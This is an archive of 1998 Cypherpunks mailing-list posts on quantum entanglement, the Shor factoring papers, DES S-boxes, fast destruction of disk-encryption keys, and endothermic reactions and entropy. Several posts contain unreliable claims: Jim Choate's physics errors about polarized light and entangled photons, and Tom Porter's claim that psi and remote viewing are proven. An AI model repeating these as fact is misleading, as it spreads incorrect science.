> will see when he opens his.

True, but your opening your cookie does not *force* Lucky to open his at the
same time. This is one fault with this model. The 'state' of the cookies are
not inter-dependant as the polarization of the photon pairs are.

>  In doing so, I have created a
> "instantaneous" correlation between two things separated by a vast

It isn't instantanous, the correlation existed when they were printed and
doesn't change. If I destroy one of the cookies it doesn't destroy the other
spontaneously as would happen in a correlated photon-pair. The state of the
individual cookies exists because of the observer and not a fundamental
requirement of the cookies existing.

> I am sure we will agree that there was no genuine faster-then-light
> communication of information in this case.

On this we can agree.

> In quantum mechanics, pairs of observables may have the property that
> both of them may not be known precisely for a physical system.  The
> Heisenberg Uncertainty principle states this for position and
> momentum.

Incorrect. The Heisenberg Uncertainty Principle states that in order to
measure one parameter the other must *necessarily* change because they are
in actuality different aspects of the *same* characteristic. They are *not*
indipendant aspects of the system being observed. Momentum and position are
different sides of the same coin. A conservation effect is what we are
dealing with. This same conservation issue arises, and in fact allows
FTL state transitions, with bound photon-pairs.

> Similar relationships exist for energy and time,
> polarization or angular momentum measured with respect to different
> axes, and various other things.  In addition, measuring a physical
> system for one such variable always changes its wavefunction into one
> for which the value of that variable is precisely specified, and the
> value of the other "non-commuting" variable is not.

Not quite. In the act of measuring one parameter we necessarily change the
other. That change is what we can't measure *at the same time* not the
absolute value at a given time tau.

> You can see this easily with three polarizing filters.  If you shine a
> light through two of them at right angles to each other, it will be
> completely blocked.

Only if the light has a single polarization. If you shine a circularly
polarized light through you will in fact see light on the other side.

[more stuff deleted]


    ____________________________________________________________________
   |                                                                    |
   |       The most powerful passion in life is not love or hate,       |
   |       but the desire to edit somebody elses words.                 |
   |                                                                    |
   |                                  Sign in Ed Barsis' office         |
   |                                                                    | 
   |            _____                             The Armadillo Group   |
   |         ,::////;::-.                           Austin, Tx. USA     |
   |        /:'///// ``::>/|/                     http://www.ssz.com/   |
   |      .',  ||||    `/( e\                                           |
   |  -====~~mm-'`-```-mm --'-                         Jim Choate       |
   |                                                 ravage@ssz.com     |
   |                                                  512-451-7087      |
   |____________________________________________________________________|





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Robert Hettinga <rah@shipwright.com>
Date: Thu, 29 Jan 1998 05:21:09 +0800
To: cypherpunks@cyberpass.net
Subject: Re: sat survailience
In-Reply-To: <3.0.32.19980127210104.006c5f24@shell15.ba.best.com>
Message-ID: <v0400390db0f53d80ff8e@[139.167.130.248]>
MIME-Version: 1.0
Content-Type: text/plain



At 12:22 am -0500 on 1/28/98, geeman@best.com wrote:


> IMPORTANT INFORMATION RESTORED AFTER INEXPLICABLE DELETION:
>
> >Staff Reporter of  WALL STREET JOURNAL>

ObExplication: "You might say that. I couldn't possibly comment."

Cheers,
Bob Hettinga
(who's copyright allowable-dollar-decrement variable has decremented rather
considerably since President Cliton's new copyright law came into effect...)

-----------------
Robert Hettinga (rah@shipwright.com), Philodox
e$, 44 Farquhar Street, Boston, MA 02131 USA
"... however it may deserve respect for its usefulness and antiquity,
[predicting the end of the world] has not been found agreeable to
experience." -- Edward Gibbon, 'Decline and Fall of the Roman Empire'
The e$ Home Page: http://www.shipwright.com/
Ask me about FC98 in Anguilla!: <http://www.fc98.ai/>






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Choate <ravage@ssz.com>
Date: Thu, 29 Jan 1998 05:15:17 +0800
To: cypherpunks@ssz.com
Subject: shor.html
Message-ID: <199801282110.PAA09102@einstein.ssz.com>
MIME-Version: 1.0
Content-Type: text/plain



   
   
   
   
     _________________________________________________________________
   
   next up previous
   Next: Introduction
   
     _________________________________________________________________
   
   
   
   
   
 ALGORITHMS FOR QUANTUM COMPUTATION: *[1EX] DISCRETE LOG AND FACTORING *[2EX]
                               EXTENDED ABSTRACT
                                       
   
   
   Peter W. Shor
   AT&T Bell Labs
   Room 2D-149
   600 Mountain Ave.
   Murray Hill, NJ 07974 USA
   *[2ex] email: shor@research.att.com 
   
   
   
   
   
   
   
  Abstract:
  
   This paper gives algorithms for the discrete log and the factoring
   problems that take random polynomial time on a quantum computer (thus
   giving the first examples of quantum cryptanalysis). 
   
   
   
     _________________________________________________________________
   
     * Introduction
     * Quantum Computation
     * Building Unitary Transformations
     * Discrete Log: The Easy Case
     * A Note on Precision
     * Discrete Log: The General Case
     * Factoring
     * Acknowledgements
     * References
     * About this document ... 
       
   
   
     _________________________________________________________________
   
   
   
    Isaac Chuang
    Thu Aug 31 08:48:03 PDT 1995





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Choate <ravage@ssz.com>
Date: Thu, 29 Jan 1998 05:17:13 +0800
To: cypherpunks@ssz.com
Subject: comp.html
Message-ID: <199801282114.PAA09205@einstein.ssz.com>
MIME-Version: 1.0
Content-Type: text/plain



   
   
   
   
     _________________________________________________________________
   
   next up previous
   Next: Computing at the atomic scale
   
     _________________________________________________________________
   
   
   
   
   
       QUANTUM COMPUTATION: A TUTORIAL COOL CENTRAL SITE OF THE HOUR 
                                       
   
   
   Samuel L. Braunstein 
   
   
   
  Abstract:
  
   Imagine a computer whose memory is exponentially larger than its
   apparent physical size; a computer that can manipulate an exponential
   set of inputs simultaneously; a computer that computes in the twilight
   zone of Hilbert space. You would be thinking of a quantum computer.
   Relatively few and simple concepts from quantum mechanics are needed
   to make quantum computers a possibility. The subtlety has been in
   learning to manipulate these concepts. Is such a computer an
   inevitability or will it be too difficult to build? 
   
   
   
   In this paper we give a tutorial on how quantum mechanics can be used
   to improve computation. Our challenge: solving an exponentially
   difficult problem for a conventional computer---that of factoring a
   large number. As a prelude, we review the standard tools of
   computation, universal gates and machines. These ideas are then
   applied first to classical, dissipationless computers and then to
   quantum computers. A schematic model of a quantum computer is
   described as well as some of the subtleties in its programming. The
   Shor algorithm [1,2] for efficiently factoring numbers on a quantum
   computer is presented in two parts: the quantum procedure within the
   algorithm and the classical algorithm that calls the quantum
   procedure. The mathematical structure in factoring which makes the
   Shor algorithm possible is discussed. We conclude with an outlook to
   the feasibility and prospects for quantum computation in the coming
   years.
   
   Let us start by describing the problem at hand: factoring a number N
   into its prime factors (e.g., the number 51688 may be decomposed as ).
   A convenient way to quantify how quickly a particular algorithm may
   solve a problem is to ask how the number of steps to complete the
   algorithm scales with the size of the ``input'' the algorithm is fed.
   For the factoring problem, this input is just the number N we wish to
   factor; hence the length of the input is . (The base of the logarithm
   is determined by our numbering system. Thus a base of 2 gives the
   length in binary; a base of 10 in decimal.) `Reasonable' algorithms
   are ones which scale as some small-degree polynomial in the input size
   (with a degree of perhaps 2 or 3).
   
   On conventional computers the best known factoring algorithm runs in
   steps [3]. This algorithm, therefore, scales exponentially with the
   input size . For instance, in 1994 a 129 digit number (known as RSA129
   [3']) was successfully factored using this algorithm on approximately
   1600 workstations scattered around the world; the entire factorization
   took eight months [4]. Using this to estimate the prefactor of the
   above exponential scaling, we find that it would take roughly 800,000
   years to factor a 250 digit number with the same computer power;
   similarly, a 1000 digit number would require years (significantly lon
   ger than the age of the universe). The difficulty of factoring large
   numbers is crucial for public-key cryptosystems, such as ones used by
   banks. There, such codes rely on the difficulty of factoring numbers
   with around 250 digits.
   
   Recently, an algorithm was developed for factoring numbers on a
   quantum computer which runs in steps where is small [1]. This is
   roughly quadratic in the input size, so factoring a 1000 digit number
   with such an algorithm would require only a few million steps. The
   implication is that public key cryptosystems based on factoring may be
   breakable.
   
   To give you an idea of how this exponential improvement might be
   possible, we review an elementary quantum mechanical experiment that
   demonstrates where such power may lie hidden [5]. The two-slit
   experiment is prototypic for observing quantum mechanical behavior: A
   source emits photons, electrons or other particles that arrive at a
   pair of slits. These particles undergo unitary evolution and finally
   measurement. We see an interference pattern, with both slits open,
   which wholely vanishes if either slit is covered. In some sense, the
   particles pass through both slits in parallel. If such unitary
   evolution were to represent a calculation (or an operation within a
   calculation) then the quantum system would be performing computations
   in parallel. Quantum parallelism comes for free. The output of this
   system would be given by the constructive interference among the
   parallel computations.
   
   
   
     _________________________________________________________________
   
     * Computing at the atomic scale:
     * Reversible computation:
     * Classical universal machines and logic gates:
     * FANOUT and ERASE:
     * Computation without ERASE:
     * Elementary quantum notation:
     * Logic gates for quantum bits:
     * Model quantum computer and quantum code:
     * Quantum parallelism: Period of a sequence:
     * Factoring numbers:
     * Prospects:
     * Appendix:
     * Acknowledgements:
     * References
     * About this document ... 
       
   
   
     _________________________________________________________________
   
   next up previous
   Next: Computing at the 
   
     _________________________________________________________________
   
   
   
   
   
     _________________________________________________________________
   
   
   
    Samuel L. Braunstein
    Wed Aug 23 11:54:31 IDT 1995





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Thomas Porter <txporter@mindspring.com>
Date: Thu, 29 Jan 1998 04:37:43 +0800
To: cypherpunks@cyberpass.net
Subject: Re: Quantum teleportation and communication
In-Reply-To: <v03102801b0f46f8a5662@[208.129.55.202]>
Message-ID: <3.0.1.16.19980128152643.29e74aca@pop.mindspring.com>
MIME-Version: 1.0
Content-Type: text/plain



At 10:29 AM 1/28/98 -0800, Tim May thoughtfully expounded thus:
[Info on various quantum effects snipped]

>More info in the sources named. Avoid the pop science treatments by Nick
>Herbert, unless other, more mainstream sources are also consulted at the
>same time. And definitely avoid the "psi" nonsense of Jack Sarfatti.
>
>Gribbin's books are pretty good.
>


While Sarfatti may be a bit whacko. PSI is proving to be anything but
nonsense.

I agree that there is a _lot_ of "sheep & goats" effect in the literature,
but I think Ed May's critiques of the AIR study of Remote Viewing done by
SAIC's Cognitive Sciences Laboratory (at http://www.lfr.org/csl/index.html
) are worth reading.  MI analysts who did RV at Ft. Meade have received
commendations and medals for the intelligence they generated using RV. 

FWIW

Tom Porter                                       txporter@mindspring.com
------------------------------------------------------------------------
"On two occasions I have been asked [by members of Parliament], 
'Pray, Mr. Babbage, if you put into the machine wrong figures, will 
the right answers come out?'  I am not able rightly to apprehend the 
kind of confusion of ideas that could provoke such a question."

FIGHT U.S. GOVT. CRYPTO-FASCISM, EXPORT A CRYPTO SYSTEM!  RSA in PERL:
print pack"C*",split/\D+/,`echo "16iII*o\U@{$/=$z;[(pop,pop,unpack"H*",<>
)]}\EsMsKsN0[lN*1lK[d2%Sa2/d0<X+d*lMLa^*lN%0]dsXx++lMlN/dsM0<J]dsJxp"|dc`





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Eric Cordian <emc@wire.insync.net>
Date: Thu, 29 Jan 1998 06:01:48 +0800
To: cypherpunks@cyberpass.net
Subject: Re: EPR, Bell, and FTL Bandwidth (fwd)
In-Reply-To: <199801282036.OAA08857@einstein.ssz.com>
Message-ID: <199801282153.PAA09550@wire.insync.net>
MIME-Version: 1.0
Content-Type: text/plain



Jim Choate writes:
 
>> Think of the classical case.  I bake two fortune cookies, one with
>> "FOO" written on the slip of paper inside, and the other reading
>> "BAR." I then put them in a box and shake it for quite a while, until
>> the final state has chaotic dependence upon initial conditions, and
>> cannot be predicted.  I then keep one fortune cookie, and mail the
>> other one to Lucky Green in Tonga.
 
>> Someday in the future, I open my cookie, and instantly know what
>> Lucky will see when he opens his.
 
> True, but your opening your cookie does not *force* Lucky to open his
> at the same time. This is one fault with this model. The 'state' of
> the cookies are not inter-dependant as the polarization of the photon
> pairs are.
 
While it is true that my examining my cookie does not force Lucky to
examine his, the same can be said of a photon experiment, where the
photons can remain in flight for an arbitrary period of time before
being measured.  However, if there is no spacelike separation between
the two measurments, one has not proved non-local collapse.
 
The state of the cookies is highly correlated, since they have
opposite values.  The polarization of the photon pairs is similarly
correlated, as they have equal values.
 
> It isn't instantanous, the correlation existed when they were printed
> and doesn't change.
 
And indeed in the photon case, the entanglement exists when two
photons with correlated wavefunctions are created.
 
> If I destroy one of the cookies it doesn't destroy the other
> spontaneously as would happen in a correlated photon-pair.
 
Nope.  Destroying one of a pair of entangled photons does nothing to
the other.  Just like the cookies.  It's just that measurements on
both photons may be correlated in a way which would seem to suggest
non-local collapse of their combined wavefunction, if a choice of
which of two non-commuting observables to measure is done on the fly.
 
But if I give you one of a pair of entangled photons, I can't make
anything happen to that photon at a distance that you can detect by
doing something to my photon, even though measurements done on both
photons may show a correlation which implies non-local collapse.
 
> Incorrect. The Heisenberg Uncertainty Principle states that in order
> to measure one parameter the other must *necessarily* change because
> they are in actuality different aspects of the *same* characteristic.
 
Not at all.  Position and momentum are like location and frequency of
a wave.  A pure sinusoidal wave exists everywhere on the t axis, and a
function whose support is confined to a small region is a
superposition of a whole range of frequencies.  I cannot make a
waveform which is non-zero simultaneously in an arbitrary small
portion of the both the time and frequency domains.  Similarly I
cannot construct a quantum mechanical wavefunction which is confined
to an arbitrarily small portion of the position and momentum domains.
 
This does not mean that position and momentum are different aspects of
some other dynamical quantity.  Both position and momentum are
fundamental dynamical variables, in and of themselves.
 
>> You can see this easily with three polarizing filters.  If you shine a
>> light through two of them at right angles to each other, it will be
>> completely blocked.
 
> Only if the light has a single polarization. If you shine a circularly
> polarized light through you will in fact see light on the other side.
 
Circularly polarized light is simply a superposition of vertically and
horizontally polarized light of different phases.  It has no magical
ability to make it through two polarizing filters set at 90 degrees to
each other.  (This is an experiment *YOU* can perform at home!)

-- 
Eric Michael Cordian 0+
O:.T:.O:. Mathematical Munitions Division
"Do What Thou Wilt Shall Be The Whole Of The Law"





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Fisher Mark <FisherM@exch1.indy.tce.com>
Date: Thu, 29 Jan 1998 05:01:56 +0800
To: "'cypherpunks'" <cypherpunks@cyberpass.net>
Subject: Microsoft Internet Explorer: Request for Comments
Message-ID: <83C932393B88D111AED30000F84104A70A1ECC@indyexch_fddi.indy.tce.com>
MIME-Version: 1.0
Content-Type: text/plain



(taking a deep breath, and donning a flame-resistant Kevlar suit...)

We are meeting with Microsoft tomorrow (1/29, 10am EST) to discuss the
problems in and needed enhancements for Internet Explorer 4.x.  If
anyone would care to pass along their comments, I would welcome them.
Note that I would prefer serious comments, although any that are both
sufficiently humorous and not too defamatory towards Microsoft might
also be passed along.  (We currently have lists of 73 bugs and 27
enhancement requests...)
==========================================================
Mark Leighton Fisher          Thomson Consumer Electronics
fisherm@indy.tce.com          Indianapolis, IN
"Browser Torture Specialist, First Class"





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Uhh...this is Joe [Randall Farmer]" <rfarmer@HiWAAY.net>
Date: Thu, 29 Jan 1998 06:06:35 +0800
Subject: Predicting cipher life / NSA rigged DES? / Destroying encrypted data (Tangent to Re: Burning papers)
In-Reply-To: <199801252007.OAA19838@manifold.algebra.com>
Message-ID: <Pine.OSF.3.96.980125142747.30243A-100000@fly.HiWAAY.net>
MIME-Version: 1.0
Content-Type: text/plain



[These messages were postponed for trillions of years I finally sent them;
apologies if something is grossly outdated.]

Been thinking, most applications for ciphers assume solely based on cipher x's
keysize that data will be secure for a certain length of time. It'd be nice if
we had some way to estimate how long we can hope the cipher to last. Of course,
there's no way to predict anything for sure, but you could make an estimate.
I'm wondering if there's any way to make a more accurate prediction of how much
more analysis it will survive with fancy statistics or something. My idea --
which I know wouldn't work very well, which is why I'm asking if there's a way
to actually make a good guess -- is averaging the remaining lifetimes in
analysis-hours of broken ciphers which survived as many person-hours of attack
as the one in question.

===============================================================================

Am I just going crazy, or is it kind of obvious that NSA knew the s-boxes they
provided for DES weren't secure? I mean, they pretty much had to know about the
attacks outside cryptographers are just now discovering -- they have more than
ten years of cryptographers' time every day, and they certainly knew about
differential cryptanalysis. Let's hope they don't meddle similarly in AES... 

===============================================================================

> > Of course, if your documents are on floppy disks, any shredder that 
> > won't jam on them does a pretty good job :-)  
>
> I burned a couple of floppies, too. Actually I am not sure how good job 
> would shredding of floppies do. I assume that bits and pieces of data 
> can still be recovered... But hopefully no one would care enough. 

One fairly simple feature for disk encryptors that came up during one of the
#ElectronicFrontiers (sp?) chats was that of using random numbers with the key
so you can demolish an encrypted volume in a split-second. Works like this:
there's one 192-bit (or whatever your keylength is) value which is a hash of
your passphrase. There's another value, this one a cryptographically random one
of the same size, stored on a fixed physical place on the disk. If you wish to
destroy the data on powerdown, there can be a third value stored in memory,
which is written to disk at authorized shutdown and read+wiped from disk at
startup. 

Anyhow, these two (or three) values are XORed together to form the key used to
encrypt the volume. When your adversaries, armed with their trusty rubber
hoses, come knocking at and/or down your door, you hit a hotkey to start
destroying those 24 bytes on disk, which can be done faster and more
effectively than a wipe of every sector in the volume. The folks with the
rubber hoses are now, assuming this is their first peek at your disk, screwed; 
even with your passphrase, they don't know a thing about your data. 

> 
> 	- Igor.

---------------------------------------------------------------------------
Randall Farmer
    rfarmer@hiwaay.net
    http://hiwaay.net/~rfarmer





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Eric Cordian <emc@wire.insync.net>
Date: Thu, 29 Jan 1998 06:13:28 +0800
To: cypherpunks@cyberpass.net
Subject: Re: Quantum teleportation and communication
In-Reply-To: <199801282100.WAA07953@basement.replay.com>
Message-ID: <199801282204.QAA09588@wire.insync.net>
MIME-Version: 1.0
Content-Type: text/plain



Anonymous writes:
 
> Tim May knows no more about quantum mechanics than he does about
> cryptography.  He is wrong about the nature of the correlation between
> the two photons.
 
Tim is right.  Please put this lovely cone-shaped hat on and sit on
the stool in the corner.
 
> Don't trust what Tim May writes.  He is not only a hypocrite
> (complaining about chemistry discussions while adding to an equally
> off-topic physics thread), but a fool as well.
 
Aren't comments like this supposed to come with an illustrative ASCII
graphic?
 
--  
Eric Michael Cordian 0+
O:.T:.O:. Mathematical Munitions Division
"Do What Thou Wilt Shall Be The Whole Of The Law"
 





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Blair <jdblair@frodo.tucc.uab.edu>
Date: Thu, 29 Jan 1998 06:19:55 +0800
To: Fisher Mark <FisherM@exch1.indy.tce.com>
Subject: Re: Microsoft Internet Explorer: Request for Comments
In-Reply-To: <83C932393B88D111AED30000F84104A70A1ECC@indyexch_fddi.indy.tce.com>
Message-ID: <199801282206.QAA24712@frodo.tucc.uab.edu>
MIME-Version: 1.0
Content-Type: text/plain



-----BEGIN PGP SIGNED MESSAGE-----



FisherM@exch1.indy.tce.com said:
> (taking a deep breath, and donning a flame-resistant Kevlar suit...)

> We are meeting with Microsoft tomorrow (1/29, 10am EST) to discuss the
> problems in and needed enhancements for Internet Explorer 4.x.  If
> anyone would care to pass along their comments, I would welcome them.
> Note that I would prefer serious comments, although any that are both
> sufficiently humorous and not too defamatory towards Microsoft might
> also be passed along.  (We currently have lists of 73 bugs and 27
> enhancement requests...)

Suggest that Microsoft encourage peer review of of the portions of IE 
used for encryption and authentication by publishing the source code 
used to implement these functions.  The quality of the code would 
certainly improve (I don't believe it could get worse ;) if MS 
incorporated suggestions in a timely matter.  Such a move would also 
do much to improve Microsoft's reputation in the "hacker" community 
(that's "hacker" in the good sense, not the intruder/cracker/vandal 
sense) by showing that they understand that "security through 
obscurity is no security."  If Microsoft (and other companies) hear 
about the need to do this often enough from enough different source, 
perhaps they will begin to listen.

 -john.


......................................................................
.                                                                    .
.....John.D.Blair...   mailto:jdblair@uab.edu   phoneto:205.975.7123 .
                   .   http://frodo.tucc.uab.edu  faxto:205.975.7129 .
 ..sys|net.admin....                                                 .
 .                     the university computer center            .....
 ..... g.e.e.k.n.i.k...the.university.of.alabama.at.birmingham....




-----BEGIN PGP SIGNATURE-----
Version: 2.6.3a
Charset: noconv

iQCVAwUBNM+r9AJjTpK3AXhBAQEvBgQAgzqpF/qJKZL10RjcB7ixI2LMQQMHejpN
3L2/97d2wvin7amtdIgyhELnSdkaTmwZsqkbfwinlg/ay0lXx9ygFLgbcC/AsIef
54vbPat3Btu+vTrINRZOomQF85LezlTDKt6fznUaoWqCOGu9L0FeiMPSN9WqY6uG
OZg3ZVf/nvY=
=j4oQ
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim@mentat.com (Jim Gillogly)
Date: Thu, 29 Jan 1998 08:34:07 +0800
To: rfarmer@HiWAAY.net
Subject: Re: Predicting cipher life / NSA rigged DES? / Destroying encrypted data (Tangent to Re: Burning papers)
Message-ID: <9801290026.AA13035@mentat.com>
MIME-Version: 1.0
Content-Type: text/plain



Randall Farmer skribis:
> Been thinking, most applications for ciphers assume solely based on cipher x's
> keysize that data will be secure for a certain length of time. ...
> My idea ... is averaging the remaining lifetimes in
> analysis-hours of broken ciphers which survived as many person-hours of attack
> as the one in question.

Doesn't seem terribly likely.  Typically ciphers will look strong until
someone discovers a chink.  The chink will sometimes lead to a serious
break, but not always, and not always quickly -- but at that point the
cipher looks weak.  Your best chance at encrypting stuff that needs a
long shelf life is with a cipher that's had a lot of analysis and
plenty of intrinsic key, like 3DES.

> Am I just going crazy, or is it kind of obvious that NSA knew the s-boxes they
> provided for DES weren't secure?

The former.  The S-boxes they replaced were bogus, and the ones they
came up with were good against differential cryptanalysis -- better
than random ones.  There's no a priori reason to believe they knew
about linear cryptanalysis, and in any case Matsui's l.c. attack on DES
is better than brute force only in situations where you have a great
deal of known or chosen plaintext.  So how come you claim they aren't
secure?  DES isn't suitable for long-archived info, but is still OK
for short-lifetime data against a not-too-motivated attacker: its
only known weakness for this application is its key-length, not its
S-boxes.

> Anyhow, these two (or three) values are XORed together to form the key used to
> encrypt the volume. When your adversaries, armed with their trusty rubber
> hoses, come knocking at and/or down your door, you hit a hotkey to start
> destroying those 24 bytes on disk, which can be done faster and more
> effectively than a wipe of every sector in the volume. The folks with the

I like it!

 	Jim Gillogly
	Trewesday, 8 Solmath S.R. 1998, 00:27
	12.19.4.15.17, 8 Caban 15 Muan, Second Lord of Night





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Attila T. Hun" <attila@hun.org>
Date: Thu, 29 Jan 1998 01:17:35 +0800
To: cypherpunks <attila@primenet.com>
Subject: can you believe the Bulgarians?
Message-ID: <19980128.170644.attila@hun.org>
MIME-Version: 1.0
Content-Type: text/plain



-----BEGIN PGP SIGNED MESSAGE-----

    can you believe it? a site dedicated to declaring
    they believe Bubba is innocent! --and have a petition.

    you can join Jack The Ripper, Ted Kaczynski, Ted Bundy,
    JFK, and a host of others in support of free oral sex
    in the Whitehouse. just type your nym and vote early
    and vote often.  1300+ hits and less than 100 marks. 

    Monica was quoted as saying she was "going to Washington 
    to get her presidental knee pads."

    enjoy... http://faith.digsys.bg/prj/clinton/clinton.html

        attila out again...   

                in disbelief that "the Creep" is still President!


-----BEGIN PGP SIGNATURE-----
Version: 2.6.3i
Charset: latin1
Comment: No safety this side of the grave. Never was; never will be

iQBVAwUBNM9leLR8UA6T6u61AQHYMwH/Sge0rVd2cYoE6gJyPCXBxf8kpNdvogB8
bsYdhV5/zwQJIdSVX+fGRLl6fdi+Qugdiii6dMP/2Y2jFDFIpYzHIg==
=/k4R
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim@mentat.com (Jim Gillogly)
Date: Thu, 29 Jan 1998 09:25:53 +0800
To: cypherpunks@toad.com
Subject: Re: Can someone look this up? (fwd)
Message-ID: <9801290114.AA13878@mentat.com>
MIME-Version: 1.0
Content-Type: text/plain



Ray Arachelian skribis:
> Can someone on the list look this up?
> 
> ***************************************************************
> If the government has no knowledge of aliens, then why does
> Title 14, Section 1211 of the Code of Federal Regulations,
> implemented on July 16, 1969, make it illegal for U.S.
> citizens to have any contact with extraterrestrials or their
> vehicles?

An authoritative-looking message from Ken Jenks of NASA appears at
http://www.geocities.com/Area51/Corridor/8148/quaranti.html .  It
says this section was repealed 26 Apr 1991, and that the intent was
to allow for a quarantine after the Apollo missions.  The full text
appears on that page.  It talks about exposure to lunar material
from NASA space shots, rather than UFO contacts.

	Jim Gillogly
	Trewesday, 8 Solmath S.R. 1998, 01:13
	12.19.4.15.18, 9 Edznab 16 Muan, Third Lord of Night





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Choate <ravage@ssz.com>
Date: Thu, 29 Jan 1998 07:26:26 +0800
To: cypherpunks@ssz.com (Cypherpunks Distributed Remailer)
Subject: Re: Interesting Chemical Reaction (fwd)
Message-ID: <199801282322.RAA09923@einstein.ssz.com>
MIME-Version: 1.0
Content-Type: text



Forwarded message:

> Date: Wed, 28 Jan 1998 17:36:28 -0500
> From: ghio@temp0200.myriad.ml.org (Matthew Ghio)
> Subject: Re: Interesting Chemical Reaction

> Here's something to ponder:
> 
> Consider two objects initially at the same temperature.  One is at the
> focus of a hemispherical mirror.  An elliptical mirror with both objects
> at its foci encloses the remaining space.
> 
> Because of the spherical mirror, the first object reabsorbs most of its
> heat lost by radiation, but most of the second object's radiated heat is
> reflected upon the first.  Hence the first object becomes warmer relative
> to the second.
> 
> The entropy here appears to decrease, but according to thermodynamics that
> is impossible.  Can anyone explain how it is that the total entropy would
> not decrease?
> 

Because the thermodynamics assume a *closed* model. The base assumption of
your model is that it is closed. This means that not only the mirror, and
the two focii are in the system, but also the light source. When taken as a
whole the entropy is constant. Now if you allow the light to pass through
the mirror from outside an initial axiomatic assumption, a closed system, 
is broken.

This is the reason that thermodynamic arguments against evolution fail, the
Earth is most certainly *not* a closed system.


    ____________________________________________________________________
   |                                                                    |
   |       The most powerful passion in life is not love or hate,       |
   |       but the desire to edit somebody elses words.                 |
   |                                                                    |
   |                                  Sign in Ed Barsis' office         |
   |                                                                    | 
   |            _____                             The Armadillo Group   |
   |         ,::////;::-.                           Austin, Tx. USA     |
   |        /:'///// ``::>/|/                     http://www.ssz.com/   |
   |      .',  ||||    `/( e\                                           |
   |  -====~~mm-'`-```-mm --'-                         Jim Choate       |
   |                                                 ravage@ssz.com     |
   |                                                  512-451-7087      |
   |____________________________________________________________________|





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Choate <ravage@ssz.com>
Date: Thu, 29 Jan 1998 07:33:34 +0800
To: cypherpunks@ssz.com (Cypherpunks Distributed Remailer)
Subject: Re: EPR, Bell, and FTL Bandwidth (fwd)
Message-ID: <199801282331.RAA09988@einstein.ssz.com>
MIME-Version: 1.0
Content-Type: text



Forwarded message:

> From: Eric Cordian <emc@wire.insync.net>
> Subject: Re: EPR, Bell, and FTL Bandwidth (fwd)
> Date: Wed, 28 Jan 1998 15:53:28 -0600 (CST)

> >> Someday in the future, I open my cookie, and instantly know what
> >> Lucky will see when he opens his.
>  
> > True, but your opening your cookie does not *force* Lucky to open his
> > at the same time. This is one fault with this model. The 'state' of
> > the cookies are not inter-dependant as the polarization of the photon
> > pairs are.
>  
> While it is true that my examining my cookie does not force Lucky to
> examine his, the same can be said of a photon experiment, where the
> photons can remain in flight for an arbitrary period of time before
> being measured.

Um, actualy no. Since the photons are coupled we know that the second photon
has actualy changed it's polarization, either that or your original
assumption they are coupled is not true. The polarization between the two
photons *must* be zero. Otherwise you arent' playing with our physics.

> The state of the cookies is highly correlated, since they have
> opposite values.  The polarization of the photon pairs is similarly
> correlated, as they have equal values.

Correlation is not a function of any quantity conservation operation.
The values of the photons are actualy opposite and therefore sum to zero.
Foo is not the inverse of Bar, as is the case for horizontal and vertical
polarization.

> > It isn't instantanous, the correlation existed when they were printed
> > and doesn't change.
>  
> And indeed in the photon case, the entanglement exists when two
> photons with correlated wavefunctions are created.

True, but the swap of polarization was *not*. That occured later and is what
changes instantly irrespective of distance.

> > If I destroy one of the cookies it doesn't destroy the other
> > spontaneously as would happen in a correlated photon-pair.
>  
> Nope.  Destroying one of a pair of entangled photons does nothing to
> the other.

Yes, it causes the correlation to be destroyed. You are not taking into
account the correllation or polarization dependency between the two photons.
Our base assumption is that when photon A is horizontal then photon B is
vertical. This *must* occur to preserve symmetry.

[more stuff deleted]


    ____________________________________________________________________
   |                                                                    |
   |       The most powerful passion in life is not love or hate,       |
   |       but the desire to edit somebody elses words.                 |
   |                                                                    |
   |                                  Sign in Ed Barsis' office         |
   |                                                                    | 
   |            _____                             The Armadillo Group   |
   |         ,::////;::-.                           Austin, Tx. USA     |
   |        /:'///// ``::>/|/                     http://www.ssz.com/   |
   |      .',  ||||    `/( e\                                           |
   |  -====~~mm-'`-```-mm --'-                         Jim Choate       |
   |                                                 ravage@ssz.com     |
   |                                                  512-451-7087      |
   |____________________________________________________________________|





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: ghio@temp0200.myriad.ml.org (Matthew Ghio)
Date: Thu, 29 Jan 1998 06:44:04 +0800
To: cypherpunks@cyberpass.net
Subject: Re: Interesting Chemical Reaction
In-Reply-To: <199801280413.WAA08034@wire.insync.net>
Message-ID: <199801282236.RAA10371@myriad>
MIME-Version: 1.0
Content-Type: text/plain



Igor Chudov @ home wrote:

> What I still do not understand though is what happens between the
> water and ammonium nitrate that consumes so much energy.
> 
> I mean, okay, you need to spend energy to mix these two things. Then,
> logically, they should not "want" to mix, right? But empirically,
> ammonuim nitrate literally sucks water vapors from the air. How come?


For the same reason that water evaporates and the remainder gets colder.

The energy is consumed by breaking the chemical bonds in the ammonium
nitrate.  Temperature is the average amount of kinetic energy of the
molecules, and so some molecules are moving faster than average and some
are moving more slowly.  The fast-moving molecules collide with the
ammonium nitrate and their energy is consumed by breaking the ionic bonds.
Since the fast-moving molecules get slowed down in the process, the
average temperature drops.


Eric Cordian wrote:

> And for those who may think that endothermic reactions violate some basic
> law about entropy always increasing, I should point out that the increase
> in entropy from the uniform mixing of two different materials can more
> than compensate for the decrease in temperature.  Ain't science wonderful?

Here's something to ponder:

Consider two objects initially at the same temperature.  One is at the
focus of a hemispherical mirror.  An elliptical mirror with both objects
at its foci encloses the remaining space.

Because of the spherical mirror, the first object reabsorbs most of its
heat lost by radiation, but most of the second object's radiated heat is
reflected upon the first.  Hence the first object becomes warmer relative
